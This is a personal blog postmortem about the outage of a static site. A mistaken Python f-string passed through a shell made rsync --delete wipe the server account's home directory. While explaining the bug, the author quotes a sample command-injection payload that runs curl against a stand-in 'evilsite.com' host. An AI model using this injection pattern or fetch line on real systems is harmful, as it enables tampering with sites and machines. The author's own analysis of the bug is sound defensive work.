Dissecting an interesting failure and complete multi-day outage of derekriemer.com: a postmortem investigation

What happened?

On January 3rd, 2023, I made a routine change to derekriemer.com, editing a draft of a new article I had written. I then tried to deploy the changes to staging.derekriemer.com, but unknown to me, several days earlier I had accidentally destroyed the entire site with a big oopsie. A combination of code as config, shell variable expansion acting in strange ways, and Python f-strings ended up being the cause of the outage. The outage would have been isolated to my staging environment, but a push process that does not properly isolate the staging environment of derekriemer.com from the production environment caused the blast radius to include the entire site, including my production domain, instead of just my staging subdomain. The outage was not detected for days because I had left a migration, intended to provide separate draft deployment configs for staging and production, in a borked state, not realizing what I had done. Because derekriemer.com is not particularly important, I had left myself with no monitoring of the site's actual status, and nobody emailed me wondering where my site went, so in effect, I let my site cease to exist for over a week. (I don't have records of the exact date of the failure, because I'm lazy with my VCS for derekriemer.com, because it's simply not that important.)

Quick overview of how derekriemer.com is set up

Derekriemer.com has two instances:

  • prod: A production instance living at derekriemer.com.
  • staging: A staging instance living at staging.derekriemer.com.

The site is powered by the Nikola static site generator. A bunch of Markdown resources are processed by the Nikola engine, injected into Jinja2 templates, and combined with the CSS theme to generate the actual site. A configuration file, written in Python, is used by Nikola to set various settings for the site, like the tagline, translations (not applicable here), timezone, post and page settings, menus, etc. Historically I didn't have separate configs for staging and prod, which was annoying. I wanted prod to not allow the viewing of draft articles, but I wanted staging to contain unpublished draft articles, not in listings but available to people I wished to have review them. The next section will explain how a seemingly innocuous Python config change, which grabbed environment variables and configured the staging and prod environments differently, caused very nasty behavior, and ultimately the destruction of the site and severe corruption of the server, with a simple rsync push.
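The staging/prod split described above could be sketched roughly like this. It is a minimal sketch, not the site's actual config: DEPLOY_DRAFTS is a Nikola setting and DEPLOYMENT_MODE is the variable name my wrapper script uses, but the settings_for helper and the fallback to staging are assumptions made purely for illustration.

```python
import os


def settings_for(mode: str) -> dict:
    """Hypothetical helper: return the settings that differ per instance."""
    if mode not in ("prod", "staging"):
        # Refuse anything unexpected instead of guessing a target.
        raise ValueError(f"unknown deployment mode: {mode!r}")
    return {
        # Drafts go to staging so reviewers can read them, never to prod.
        "DEPLOY_DRAFTS": mode == "staging",
    }


# In a conf.py, something like this would run when Nikola loads the config.
# Falling back to "staging" when the variable is missing is an assumption.
ENVIRON = os.environ.get("DEPLOYMENT_MODE", "staging")
DEPLOY_DRAFTS = settings_for(ENVIRON)["DEPLOY_DRAFTS"]
```

The point of funnelling everything through one function is that an unknown mode fails loudly at config load time, long before any deploy command is built.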

How the bad environment configuration worked

On my local machine, I have a wrapper script around Nikola that sets the environment, then builds, deploys, etc. the site. The config saves the environment variable for production mode in a Python variable called ENVIRON. The config then used a bad f-string substitution to determine which directory on my server to write to. At the time of this outage, I was writing TypeScript on a regular basis. Therefore, it slipped my mind that Python f-strings are not like JavaScript template literals. Take the below JavaScript code.

const TEMPLATE = `rsync output user@derekriemer.com:${ENVIRON} --delete`

The Python equivalent would be

TEMPLATE = F"rsync output user@derekriemer.com:{ENVIRON} --delete"

Instead, I wrote the following

TEMPLATE = F"rsync output user@derekriemer.com:${ENVIRON} --delete"

The devil is in the details here. The $ in a Python f-string is literal. It isn't part of any sort of escape, so the $ survived into the generated command, where a shell reads it as the start of a variable reference. Under normal circumstances, that wouldn't be a big deal, because shell substitution doesn't apply by default for subprocess.call, Popen, etc. Nikola, however, uses shell=True on subprocess.Popen, and thus the variable reference was interpreted by the shell.

This also introduced a subtle security vulnerability. If an attacker somehow put ; curl evilsite.com/attack.html > output/attack.html; # in $ENVIRON, they could arrange to get my site to upload evilsite.com's attack.html the next time I synced. Or they could use an injection attack to do anything they wanted to my machine. The command that runs would then look like this:

rsync output user@derekriemer.com:; curl evilsite.com/attack.html > output/attack.html; # --delete

This, however, doesn't really matter, because if someone has access to my local machine, and the key material and authentication methods necessary to use my ssh keys, I have bigger problems than some weirdo setting environment variables instead of simply pwning all the things or using my server for whatever material they want to post. It's one of those "security vulnerabilities" that a person who really hasn't analyzed the risks before would freak out about, but anyone with industry experience would realize has very limited scope in this case. Of course, given that I found an injection attack in my code, I fixed it and thought about the steps that let me cause it to happen to begin with, but I didn't lose sleep over it. It's interesting nevertheless.
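To make the difference between the two Python template lines above concrete, here is a minimal sketch. It assumes a POSIX shell, uses the placeholder host example.invalid, and assumes ENVIRON holds the string "staging"; none of those come from my real setup. Note that with an f-string the text after the $ is the value of ENVIRON, so in this sketch the name the shell tries to look up is staging. The command is only echoed through the shell, never executed as rsync.

```python
import os
import shlex
import subprocess

ENVIRON = "staging"  # assumed value, for illustration only

intended = f"rsync output user@example.invalid:{ENVIRON} --delete"
mistaken = f"rsync output user@example.invalid:${ENVIRON} --delete"

print(intended)  # the braces alone are the whole placeholder
print(mistaken)  # the $ is kept as a literal character


def shell_view(command: str) -> str:
    """Return what a POSIX shell makes of the command after expansion."""
    # Prefixing echo means nothing is synced; the environment is cut down
    # to PATH so that no stray variable happens to be set.
    result = subprocess.run(
        "echo " + command,
        shell=True,
        env={"PATH": os.environ.get("PATH", "")},
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


# The unset variable expands to nothing, leaving a bare "host:" destination.
print(shell_view(mistaken))

# shlex.quote wraps hostile text in single quotes so a shell would treat it
# as one plain word instead of as extra commands.
payload = "; curl evilsite.com/attack.html > output/attack.html; #"
print(shlex.quote(payload))
```

Passing an argument list to subprocess without shell=True sidesteps both problems, but that is not an option when the tool running the command insists on a shell string, which is why quoting is shown here.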

How the server is laid out

Staging is simply a subdomain of prod. The server has a user account (not to be named for security purposes), protected by an ssh keypair, that stores the HTML assets. Separate nginx configs have roots pointing to derekriemer.com's files for prod, and staging.derekriemer.com's files for staging. The roots point to directories with the proper world-readable permissions, but the parent directory (and home of the user) does not allow reading the data stored there, and the config expressly forbids URLs with a "." prefix other than .well-known. So, we have the following user account, with "love" as the user, because that's the random word I picked:

/home/love
  /
    prod
      ...
      index.html
    staging
      ...
      index.html

With prod and staging both living in the same user account, what happens if, somehow, files aren't written to /staging, but to the parent, /home/love? rsync will write the contents of my website to /home/love, and since I had --delete in the options for rsync, it will delete every file that isn't being synced (necessary because when I delete a page, or undeploy a post, I need that post to go bye bye).
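One cheap defence against that scenario is to check the destination before rsync ever runs. The following is a minimal sketch under stated assumptions: the helper names and the allow-list are hypothetical, and the only thing taken from the layout above is that the two legitimate targets are the prod and staging directories under the user's home.

```python
ALLOWED_DIRS = {"prod", "staging"}  # directory names from the layout above


def remote_path(destination: str) -> str:
    """Return the path part of an rsync 'user@host:path' destination."""
    _host, sep, path = destination.partition(":")
    if not sep:
        raise ValueError(f"not a remote destination: {destination!r}")
    return path


def check_destination(destination: str) -> str:
    """Hypothetical guard: only allow syncing into a known site directory."""
    path = remote_path(destination).rstrip("/")
    if path not in ALLOWED_DIRS:
        # An empty path means the remote home directory, which is exactly
        # where --delete does the most damage.
        raise ValueError(f"refusing to rsync --delete into {destination!r}")
    return destination


# Usage: a bare "host:" destination is rejected before anything is deleted.
for candidate in ("love@derekriemer.com:staging", "love@derekriemer.com:"):
    try:
        print("ok:", check_destination(candidate))
    except ValueError as error:
        print("blocked:", error)
```

An allow-list is deliberately stricter than checking for an empty path, since "." or "~" would be just as destructive as nothing at all.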

How I discovered the issue

On January 3rd, I attempted to push a change to an upcoming post, along with updates to the copyright year, to the site. I ran ./nikola_runner.sh build, then I ran ./nikola_runner.sh deploy, which would deploy to staging. There was a bug in my script though. The shell variable that ended up in the command was not set (the environment variable I use for this script is called DEPLOYMENT_MODE), so the shell substituted nothing for it, even though ENVIRON is properly set in Python. Therefore, rsync --delete output love@derekriemer.com: was run. Oops! Guess what is under the user account? Oh yeah, duh, .ssh! The way I found this was logging into the server under another ssh account, and running a listing on that directory. Of course, when I saw the contents of my site and nothing more I was like, whoa!
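A shell happily turns an unset variable into an empty string, so one way to catch this class of bug is to scan the generated command for variable references and refuse to run it if any of them are unset. This is a minimal sketch, not something my wrapper script did: the function name and the SOME_DIR variable are hypothetical, and the regular expression only covers the plain $NAME and ${NAME} forms.

```python
import re

# Matches $NAME or ${NAME}. Quoting is ignored, so this check is
# deliberately conservative: it may flag a $ that a shell would keep literal.
_VAR_REF = re.compile(
    r"\$(?:\{([A-Za-z_][A-Za-z0-9_]*)\}|([A-Za-z_][A-Za-z0-9_]*))"
)


def unset_references(command: str, env: dict) -> list:
    """Return the variable names the command references that env lacks."""
    names = [braced or bare for braced, bare in _VAR_REF.findall(command)]
    return [name for name in names if name not in env]


# Usage: the script exports DEPLOYMENT_MODE, but the command asks for
# something else, so the deploy should stop here.
command = "rsync --delete output love@derekriemer.com:$SOME_DIR"
missing = unset_references(command, {"DEPLOYMENT_MODE": "staging"})
if missing:
    print("refusing to deploy, unset variables:", ", ".join(missing))
```

In a shell-only wrapper, the same idea is usually expressed by making the shell treat unset variables as errors rather than scanning the string by hand.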

Why I was surprised

I've intentionally set my site up as a static site for a couple of reasons.

  • I don't need a CMS. I find most of them annoying for code publishing, etc., and all of them have accessibility annoyances that my text editor solved years ago. I'm not fighting with a CMS when I can just write Markdown.
  • Maintaining a database on my server necessitates taking extra security risks. Since the entirety of my site is static, by design, the extra security risks of a CMS that uses a database are simply unnecessary. Databases are complex pieces of technology, and the code that interacts with them is commonly a source of security vulnerabilities. If I, or a hosting company of my choosing, mess up the configuration or protection of the database, the database can be poisoned by attackers to do whatever they want. For example, WordPress, while extremely well maintained, sometimes has security vulnerabilities discovered, and plugins are notorious for them. Any CMS like WordPress that has enough users will be the target of attacks within hours, not days. I simply don't want to take on the responsibility of updating a system that fast or risk attacks. My static content, on the other hand, is simply a bunch of standard files, protected by standard filesystem primitives, and handled by an extremely simple server config. I can, in the event of a DDoS attack or server outage, give HTML and CSS assets to someone like Cloudflare and be online without any mucking around.
  • Most CMS systems, by querying a database, are lower performance than simple HTML assets. My website, by being static HTML, most of which rarely changes, is incredibly quick to load, doesn't hydrate anything with JavaScript after load, doesn't need unnecessary JavaScript or database queries, etc. By being static HTML, my site can be cached with ease, so users who visit my site and then click around can often receive many of the resources without even touching the network. I'm not adding complexity by using a CMS, frontend framework, etc., when I can compile everything up front to be literally stock boring HTML. Boring is good sometimes. Many web developers need to learn to stop overengineering things. I'm always maddened when common sites load several megabytes of plutonium-infested garbage, only to load a simple article or similar.
  • Given that most CMS systems have accessibility annoyances and performance considerations, why bother maintaining and dealing with one when it's more performant, more secure, and less hassle for me to just use a static site generator?

Given how I've gone to great lengths to make my content as simple to maintain and deal with as possible, I was surprised by how a simple config change ended up blowing everything away. Mostly, it reiterated lessons I've learned over the past few years: config is just as dangerous as code when configuring a system, especially if that config is either interpreted or is actual code.